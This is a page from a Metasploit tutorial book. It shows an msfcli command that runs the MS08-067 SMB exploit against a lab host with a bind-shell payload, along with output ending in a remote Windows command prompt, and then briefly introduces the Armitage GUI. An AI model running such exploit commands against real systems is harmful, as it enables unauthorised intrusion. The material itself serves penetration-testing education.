background image

Metasploit Basics

11

Compatible payloads
===================

   Name 

Description

   ---- 

-----------

   generic/debug_trap 

Generate a debug trap in the target process

   generic/shell_bind_tcp 

Listen for a connection and spawn a command shell

Having set all the required options for our exploit and selecting a pay-

load, we can run our exploit by passing the letter 

E

 to the end of the 

msfcli

 

argument string, as shown here:

root@bt:/# 

msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E

[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.101:46025 -> 192.168.1.155:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

We’re successful, because we have received a Windows command 

prompt from the remote system.

Armitage

The 

armitage

 component of Metasploit is a fully interactive graphical user 

interface created by Raphael Mudge. This interface is highly impressive, 
feature rich, and available for free. We won’t be covering 

armitage

 in depth, 

but it is definitely worth mentioning as something to explore. Our goal is 
to teach the ins and outs of Metasploit, and the GUI is awesome once you 
understand how the Framework actually operates.

Running Armitage

To launch 

armitage

, run the command 

armitage

. During startup, select 

Start 

MSF

, which will allow 

armitage

 to connect to your Metasploit instance.

root@bt:/opt/framework3/msf3# 

armitage

After 

armitage

 is running, simply click a menu to perform a particular 

attack or access other Metasploit functionality. For example, Figure 2-1 shows 
the browser (client-side) exploits.